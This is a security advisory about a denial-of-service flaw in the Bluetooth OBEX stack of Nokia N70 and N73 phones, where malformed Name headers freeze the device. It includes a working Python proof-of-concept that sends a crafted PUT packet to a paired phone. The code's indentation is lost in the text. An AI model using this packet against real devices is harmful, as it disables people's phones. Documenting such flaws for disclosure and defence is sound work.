Nokia N70/N73 Bluetooth Stack OBEX Implementation Denial of Service
Nokia N70/N73 Bluetooth Stack OBEX Implementation Denial of Service
------------------------------------------------------------------
I. Summary
Nokia N70 and N73 are two popular models from Nokia's N-series lineup of smart
phones. A flaw has been found in the OBEX implementation in these two models,
which is related to illegal characters in the Name header of a PUT request in
an OBEX session. These characters can't be handled properly by the OBEX
implementation and will cause denial of service (phone lockup) if exploited
successfully.
------------------------------------------------------------------
II. Description
According to the IrOBEX specification, certain path characters (i.e. ':', '/'
and '\') are not allowed in the string of the Name header. However, the OBEX
implementation in N70/N73, and possibly other models, failed to cope with
exceptional conditions to this prescription, and in the case that the Name
string consists of one of the following Unicode characters:
0x0009 (Tab)
0x000a (Line feed)
0x000b (Vertical tab)
0x000c (Form feed)
0x000d (Carriage return)
0x003a (':')
0x005c ('\')
the bluetooth stack would crash and cause the phone to freeze. It should be
noted that in order to exploit this, the attacker will have to pair with victim
phone in the first place. This vulnerability can be illustrated by the
following python code (require the PyBluez package, tested under Python 2.5.2,
PyBluez 0.15 with Microsoft bluetooth stack from Windows XP SP2):
# PoC code to demonstrate the flaw in the OBEX implementation of Nokia phones
# Tested under Windows XP SP2
# Coded by the penetration test team Of NCNIPC (China)
# PyBluez are required to run the code
from bluetooth import *
# Bluetooth address and OBEX channel of the target device
# Replace them with the appropriate values for your device
target = ("00:15:A0:F9:E6:03", 10)
# Make a connection
sock = BluetoothSocket(RFCOMM)
sock.connect(target)
# Connect to the OBEX service
connect_pkg = "\x80\x00\x07\x10\x00\xff\xfe"
sock.send(connect_pkg)
con_recv=sock.recv(20)
if con_recv[0]=='\xa0':
# Now we are connected
# The name string that consists of a single 0x0009 character, which will
# cause the phone to lock up
name_str = "\x00\x09"
# Construct and send the malformed packet
name_header = "\x01\x00" + chr(len(name_str) + 5) + name_str + "\x00\x00";
body_header =
"\x49\x00\xa0\x42\x45\x47\x49\x4e\x3a\x56\x43\x41\x52\x44\x0d\x0a\x56\x45\x52\x53\x49\x4f\x4e\x3a\x32\x2e\x31\x0d\x0a\x4e\x3b\x45\x4e\x43\x4f\x44\x49\x4e\x47\x3d\x38\x42\x49\x54\x3b\x43\x48\x41\x52\x53\x45\x54\x3d\x55\x54\x46\x2d\x38\x3a\x42\x6c\x6f\x67\x67\x73\x3b\x4a\x6f\x65\x0d\x0a\x54\x45\x4c\x3b\x50\x52\x45\x46\x3b\x43\x45\x4c\x4c\x3b\x56\x4f\x49\x43\x45\x3a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x0d\x0a\x54\x45\x4c\x3b\x56\x4f\x49\x43\x45\x3a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x0d\x0a\x45\x4d\x41\x49\x4c\x3a\x72\x6f\x6f\x74\x40\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x0d\x0a\x45\x4e\x44\x3a\x56\x43\x41\x52\x44\x0d\x0a"
put_pkg = "\x82\x00" + chr(len(name_header) + len(body_header) + 3) +
name_header + body_header
print "Packet dump: ", binascii.b2a_hex(put_pkg)
sock.send(put_pkg)
print "Packet sent"
try:
resp = sock.recv(20)
print "Response dump: %s" %(binascii.b2a_hex(resp))
except:
print "Failed to receive response: ", sys.exc_info()[0]
sock.close()
------------------------------------------------------------------
III. Impact
Denial of service: the phone would freeze and loss responsiveness, the only way
to make it function normally is to take out battery, reinstall it and power on
the phone.
------------------------------------------------------------------
IV. Affected
Nokia N70 and N73. Other phone models may also be affected due to code reuse.
------------------------------------------------------------------
V. Solution
Don't pair with suspicious bluetooth device. Disable bluetooth if necessary.
------------------------------------------------------------------
VI. Credit
The penetration test team Of NCNIPC (China) is credited for this vulnerability.